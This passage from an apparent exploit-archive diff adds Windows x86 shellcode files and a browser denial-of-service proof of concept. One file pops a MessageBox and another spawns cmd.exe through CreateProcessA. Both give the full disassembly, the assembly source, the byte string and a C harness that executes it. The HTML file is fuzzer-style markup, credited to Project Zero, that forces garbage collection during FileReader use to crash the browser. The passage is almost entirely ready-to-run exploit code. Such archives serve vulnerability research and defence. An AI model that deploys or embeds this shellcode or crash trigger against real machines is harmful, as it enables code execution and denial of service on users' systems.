+  48:	8b 14 96             	mov    (%esi,%edx,4),%edx
+  4b:	01 ca                	add    %ecx,%edx
+  4d:	89 d6                	mov    %edx,%esi
+  4f:	89 cf                	mov    %ecx,%edi
+  51:	31 db                	xor    %ebx,%ebx
+  53:	53                   	push   %ebx
+  54:	68 61 72 79 41       	push   $0x41797261
+  59:	68 4c 69 62 72       	push   $0x7262694c
+  5e:	68 4c 6f 61 64       	push   $0x64616f4c
+  63:	54                   	push   %esp
+  64:	51                   	push   %ecx
+  65:	ff d2                	call   *%edx
+  67:	83 c4 10             	add    $0x10,%esp
+  6a:	31 c9                	xor    %ecx,%ecx
+  6c:	68 6c 6c 42 42       	push   $0x42426c6c
+  71:	88 4c 24 02          	mov    %cl,0x2(%esp)
+  75:	68 33 32 2e 64       	push   $0x642e3233
+  7a:	68 75 73 65 72       	push   $0x72657375
+  7f:	54                   	push   %esp
+  80:	ff d0                	call   *%eax
+  82:	83 c4 0c             	add    $0xc,%esp
+  85:	31 c9                	xor    %ecx,%ecx
+  87:	68 6f 78 41 42       	push   $0x4241786f
+  8c:	88 4c 24 03          	mov    %cl,0x3(%esp)
+  90:	68 61 67 65 42       	push   $0x42656761
+  95:	68 4d 65 73 73       	push   $0x7373654d
+  9a:	54                   	push   %esp
+  9b:	50                   	push   %eax
+  9c:	ff d6                	call   *%esi
+  9e:	83 c4 0c             	add    $0xc,%esp
+  a1:	31 d2                	xor    %edx,%edx
+  a3:	31 c9                	xor    %ecx,%ecx
+  a5:	52                   	push   %edx
+  a6:	68 73 67 21 21       	push   $0x21216773
+  ab:	68 6c 65 20 6d       	push   $0x6d20656c
+  b0:	68 53 61 6d 70       	push   $0x706d6153
+  b5:	8d 14 24             	lea    (%esp),%edx
+  b8:	51                   	push   %ecx
+  b9:	68 68 65 72 65       	push   $0x65726568
+  be:	68 68 69 20 54       	push   $0x54206968
+  c3:	8d 0c 24             	lea    (%esp),%ecx
+  c6:	31 db                	xor    %ebx,%ebx
+  c8:	43                   	inc    %ebx
+  c9:	53                   	push   %ebx
+  ca:	52                   	push   %edx
+  cb:	51                   	push   %ecx
+  cc:	31 db                	xor    %ebx,%ebx
+  ce:	53                   	push   %ebx
+  cf:	ff d0                	call   *%eax
+  d1:	31 c9                	xor    %ecx,%ecx
+  d3:	68 65 73 73 41       	push   $0x41737365
+  d8:	88 4c 24 03          	mov    %cl,0x3(%esp)
+  dc:	68 50 72 6f 63       	push   $0x636f7250
+  e1:	68 45 78 69 74       	push   $0x74697845
+  e6:	8d 0c 24             	lea    (%esp),%ecx
+  e9:	51                   	push   %ecx
+  ea:	57                   	push   %edi
+  eb:	ff d6                	call   *%esi
+  ed:	31 c9                	xor    %ecx,%ecx
+  ef:	51                   	push   %ecx
+  f0:	ff d0                	call   *%eax
+*/
+
+
+/*
+section .text
+	global _start
+_start:
+
+xor ecx,ecx
+mov eax,[fs:ecx+0x30] ;PEB
+mov eax,[eax+0xc] ;PEB->Ldr
+mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
+lodsd
+xchg esi,eax
+lodsd
+mov ecx,[eax+0x10] ;kernel32 base address
+
+
+xor ebx,ebx
+mov ebx,[ecx+0x3c] ;DOS->elf_anew
+add ebx,ecx
+mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
+add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
+
+mov esi,[ebx+0x20] ;AddressOfNames
+add esi,ecx
+
+;--------------------------------------------------
+
+
+xor edx,edx
+g:
+inc edx
+lodsd
+add eax,ecx
+cmp dword [eax],'GetP'
+jnz g
+cmp dword [eax+4],'rocA'
+jnz g
+cmp dword [eax+8],'ddre'
+jnz g
+
+
+;-----------------------------------------------------
+
+mov esi,[ebx+0x1c] ;AddressOfFunctions
+add esi,ecx
+;---------------------------------
+
+
+mov edx,[esi+edx*4]
+add edx,ecx ;GetProcAddress()
+
+;------------------
+mov esi,edx
+mov edi,ecx
+;--------------------
+
+;finding address of LoadLibraryA()
+xor ebx,ebx
+push ebx
+push 0x41797261
+push 0x7262694c
+push 0x64616f4c
+
+
+push esp
+push ecx
+
+call edx
+
+add esp,16
+;---------------------------
+xor ecx,ecx
+
+;LoadLibraryA("user32.dll")
+push 0x42426c6c
+mov [esp+2],byte cl
+push 0x642e3233
+push 0x72657375
+
+
+push esp
+call eax
+
+;-------------------------
+
+;Finding address of MessageBoxA()
+add esp,12
+xor ecx,ecx
+push 0x4241786f
+mov [esp+3],byte cl
+push 0x42656761
+push 0x7373654d
+
+push esp
+push eax
+
+call esi
+
+;---------------------------------
+add esp,12
+
+;----------------
+;MessageBoxA(NULL,"Sample msg!!","hi There",1)
+
+xor edx,edx
+xor ecx,ecx
+
+
+push edx
+push 0x21216773
+push 0x6d20656c
+push 0x706d6153
+
+lea edx,[esp] ; "Sample msg!!"
+
+push ecx
+push 0x65726568
+push 0x54206968
+
+lea ecx,[esp] ; "hi There"
+
+xor ebx,ebx
+
+inc ebx
+
+
+push ebx
+push edx
+push ecx
+xor ebx,ebx
+push ebx
+
+call eax
+
+
+;----------------------
+xor ecx,ecx
+push 0x41737365
+mov [esp+3],byte cl
+push 0x636f7250
+push 0x74697845
+
+
+lea ecx,[esp]
+
+
+push ecx
+push edi
+
+call esi
+
+;---------------
+xor ecx,ecx
+push ecx
+call eax
+*/
+
+
+#include<stdio.h>
+#include<string.h>
+char shellcode[]=\
+
+"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x67\x21\x21\x68\x6c\x65\x20\x6d\x68\x53\x61\x6d\x70\x8d\x14\x24\x51\x68\x68\x65\x72\x65\x68\x68\x69\x20\x54\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
+
+main()
+{
+printf("shellcode lenght %ld\n",(long)strlen(shellcode));
+(* (int(*)()) shellcode) ();
+}

platforms/win_x86/shellcode/40246.c

@@ -0,0 +1,328 @@
+/*
+	# Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode
+	# Author : Roziul Hasan Khan Shifat
+	# Date : 15-08-2016
+	# Tested On : Windows 7 x86
+*/
+
+
+/*
+Disassembly of section .text:
+
+00000000 <_start>:
+   0:	31 c9                	xor    %ecx,%ecx
+   2:	64 8b 41 30          	mov    %fs:0x30(%ecx),%eax
+   6:	8b 40 0c             	mov    0xc(%eax),%eax
+   9:	8b 70 14             	mov    0x14(%eax),%esi
+   c:	ad                   	lods   %ds:(%esi),%eax
+   d:	96                   	xchg   %eax,%esi
+   e:	ad                   	lods   %ds:(%esi),%eax
+   f:	8b 48 10             	mov    0x10(%eax),%ecx
+  12:	31 db                	xor    %ebx,%ebx
+  14:	8b 59 3c             	mov    0x3c(%ecx),%ebx
+  17:	01 cb                	add    %ecx,%ebx
+  19:	8b 5b 78             	mov    0x78(%ebx),%ebx
+  1c:	01 cb                	add    %ecx,%ebx
+  1e:	8b 73 20             	mov    0x20(%ebx),%esi
+  21:	01 ce                	add    %ecx,%esi
+  23:	31 d2                	xor    %edx,%edx
+
+00000025 <func>:
+  25:	42                   	inc    %edx
+  26:	ad                   	lods   %ds:(%esi),%eax
+  27:	01 c8                	add    %ecx,%eax
+  29:	81 38 47 65 74 50    	cmpl   $0x50746547,(%eax)
+  2f:	75 f4                	jne    25 <func>
+  31:	81 78 04 72 6f 63 41 	cmpl   $0x41636f72,0x4(%eax)
+  38:	75 eb                	jne    25 <func>
+  3a:	81 78 08 64 64 72 65 	cmpl   $0x65726464,0x8(%eax)
+  41:	75 e2                	jne    25 <func>
+  43:	8b 73 1c             	mov    0x1c(%ebx),%esi
+  46:	01 ce                	add    %ecx,%esi
+  48:	8b 14 96             	mov    (%esi,%edx,4),%edx
+  4b:	01 ca                	add    %ecx,%edx
+  4d:	89 d6                	mov    %edx,%esi
+  4f:	89 cf                	mov    %ecx,%edi
+  51:	31 db                	xor    %ebx,%ebx
+  53:	68 79 41 41 41       	push   $0x41414179
+  58:	66 89 5c 24 01       	mov    %bx,0x1(%esp)
+  5d:	68 65 6d 6f 72       	push   $0x726f6d65
+  62:	68 65 72 6f 4d       	push   $0x4d6f7265
+  67:	68 52 74 6c 5a       	push   $0x5a6c7452
+  6c:	54                   	push   %esp
+  6d:	51                   	push   %ecx
+  6e:	ff d2                	call   *%edx
+  70:	83 c4 10             	add    $0x10,%esp
+  73:	31 c9                	xor    %ecx,%ecx
+  75:	89 ca                	mov    %ecx,%edx
+  77:	b2 54                	mov    $0x54,%dl
+  79:	51                   	push   %ecx
+  7a:	83 ec 54             	sub    $0x54,%esp
+  7d:	8d 0c 24             	lea    (%esp),%ecx
+  80:	51                   	push   %ecx
+  81:	52                   	push   %edx
+  82:	51                   	push   %ecx
+  83:	ff d0                	call   *%eax
+  85:	59                   	pop    %ecx
+  86:	31 d2                	xor    %edx,%edx
+  88:	68 73 41 42 42       	push   $0x42424173
+  8d:	66 89 54 24 02       	mov    %dx,0x2(%esp)
+  92:	68 6f 63 65 73       	push   $0x7365636f
+  97:	68 74 65 50 72       	push   $0x72506574
+  9c:	68 43 72 65 61       	push   $0x61657243
+  a1:	8d 14 24             	lea    (%esp),%edx
+  a4:	51                   	push   %ecx
+  a5:	52                   	push   %edx
+  a6:	57                   	push   %edi
+  a7:	ff d6                	call   *%esi
+  a9:	59                   	pop    %ecx
+  aa:	83 c4 10             	add    $0x10,%esp
+  ad:	31 db                	xor    %ebx,%ebx
+  af:	68 65 78 65 41       	push   $0x41657865
+  b4:	88 5c 24 03          	mov    %bl,0x3(%esp)
+  b8:	68 63 6d 64 2e       	push   $0x2e646d63
+  bd:	8d 1c 24             	lea    (%esp),%ebx
+  c0:	31 d2                	xor    %edx,%edx
+  c2:	b2 44                	mov    $0x44,%dl
+  c4:	89 11                	mov    %edx,(%ecx)
+  c6:	8d 51 44             	lea    0x44(%ecx),%edx
+  c9:	56                   	push   %esi
+  ca:	31 f6                	xor    %esi,%esi
+  cc:	52                   	push   %edx
+  cd:	51                   	push   %ecx
+  ce:	56                   	push   %esi
+  cf:	56                   	push   %esi
+  d0:	56                   	push   %esi
+  d1:	56                   	push   %esi
+  d2:	56                   	push   %esi
+  d3:	56                   	push   %esi
+  d4:	53                   	push   %ebx
+  d5:	56                   	push   %esi
+  d6:	ff d0                	call   *%eax
+  d8:	5e                   	pop    %esi
+  d9:	83 c4 08             	add    $0x8,%esp
+  dc:	31 db                	xor    %ebx,%ebx
+  de:	68 65 73 73 41       	push   $0x41737365
+  e3:	88 5c 24 03          	mov    %bl,0x3(%esp)
+  e7:	68 50 72 6f 63       	push   $0x636f7250
+  ec:	68 45 78 69 74       	push   $0x74697845
+  f1:	8d 1c 24             	lea    (%esp),%ebx
+  f4:	53                   	push   %ebx
+  f5:	57                   	push   %edi
+  f6:	ff d6                	call   *%esi
+  f8:	31 c9                	xor    %ecx,%ecx
+  fa:	51                   	push   %ecx
+  fb:	ff d0                	call   *%eax
+*/
+
+
+/*
+section .text
+	global _start
+_start:
+
+
+xor ecx,ecx
+mov eax,[fs:ecx+0x30] ;PEB
+mov eax,[eax+0xc] ;PEB->ldr
+mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
+lodsd
+xchg esi,eax
+lodsd
+mov ecx,[eax+0x10] ;kernel32 base address
+
+
+xor ebx,ebx
+mov ebx,[ecx+0x3c] ;DOS->elf_anew
+add ebx,ecx ;PE HEADER
+mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
+add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
+
+mov esi,[ebx+0x20] ;AddressOfNames
+add esi,ecx
+
+
+;---------------------------------------------
+
+xor edx,edx
+
+func:
+inc edx
+lodsd
+add eax,ecx
+cmp dword [eax],'GetP'
+jnz func
+cmp dword [eax+4],'rocA'
+jnz func
+cmp dword [eax+8],'ddre'
+jnz func
+
+
+;--------------------------------
+
+
+mov esi,[ebx+0x1c] ;AddressOfFunctions
+add esi,ecx
+
+mov edx,[esi+edx*4]
+add edx,ecx ;GetProcAddress()
+
+;-------------------------------------
+
+mov esi,edx
+mov edi,ecx
+
+;-------------------------
+
+
+xor ebx,ebx
+
+
+;finding address of RtlZeroMemory()
+
+push 0x41414179
+mov [esp+1],word bx
+push 0x726f6d65
+push 0x4d6f7265
+push 0x5a6c7452
+
+
+
+push esp
+push ecx
+
+call edx
+
+;------------------------------
+add esp,16
+;-----------------------------------
+
+
+;zero out 84 bytes
+
+
+xor ecx,ecx
+mov edx,ecx
+
+mov dl,84
+
+push ecx
+
+sub esp,84
+
+lea ecx,[esp]
+
+push ecx
+
+push edx
+push ecx
+
+call eax
+
+
+;----------------------------
+
+;finding address of CreateProcessA()
+pop ecx
+
+xor edx,edx
+
+push 0x42424173
+mov [esp+2],word dx
+push 0x7365636f
+push 0x72506574
+push 0x61657243
+
+lea edx,[esp]
+
+push ecx
+
+push edx
+push edi
+
+call esi
+
+
+;--------------------------------
+;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION)
+
+pop ecx
+
+add esp,16
+
+xor ebx,ebx
+push 0x41657865
+mov [esp+3],byte bl
+push 0x2e646d63
+
+lea ebx,[esp]
+
+
+xor edx,edx
+mov dl,68
+
+mov [ecx],edx
+
+lea edx,[ecx+68]
+
+
+push esi ;
+
+xor esi,esi
+
+
+push edx
+push ecx
+
+push esi
+push esi
+push esi
+push esi
+push esi
+push esi
+
+push ebx
+push esi
+
+call eax
+
+pop esi
+
+;-------------------------------------
+;finding address of ExitProcess()
+
+add esp,8
+
+xor ebx,ebx
+
+push 0x41737365
+mov [esp+3],byte bl
+push 0x636f7250
+push 0x74697845
+
+
+lea ebx,[esp]
+
+
+push ebx
+push edi
+
+call esi
+
+xor ecx,ecx
+push ecx
+call eax
+*/
+
+
+#include<stdio.h>
+#include<string.h>
+char shellcode[]=\
+
+"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0";
+
+main()
+{
+printf("shellcode lenght %ld\n",(long)strlen(shellcode));
+(* (int(*)()) shellcode) ();
+}

platforms/windows/dos/40253.html

@@ -0,0 +1,21 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=827
+-->
+
+<script>
+function eventhandler1() {
+  CollectGarbage();
+}
+
+function eventhandler5() {
+  try { /*FileReader*/ var var00063 = new FileReader(); } catch(err) { } //line 68
+  try { /*Blob*/ var var00064 = new Blob(); } catch(err) { } //line 69
+  try { var00063.readAsDataURL(var00064); } catch(err) { } //line 70
+}
+</script>
+
+</noembed>
+<applet onmouseout="eventhandler6()" truespeed="-1.86811e+009" spellcheck="A" frameborder="all" pluginurl="bottom" link="-32" part="file" ononline="eventhandler1()" onwebkittransitionend="eventhandler10()" onerror="eventhandler5()" char="void" direction="-1">iiThS9l_J8
+</xmp>
+</select>A7
+<object results="object" default="black" aria_checked="1" action="row" onwebkitanimationiteration="eventhandler4()" playcount="bottom" playcount="poly" onsearch="eventhandler4()" oninput="eventhandler9()" translate="left" for="1" checked="-0.155515%" aria_selected="hsides" onerror="eventhandler1()" aria_valuemin="file">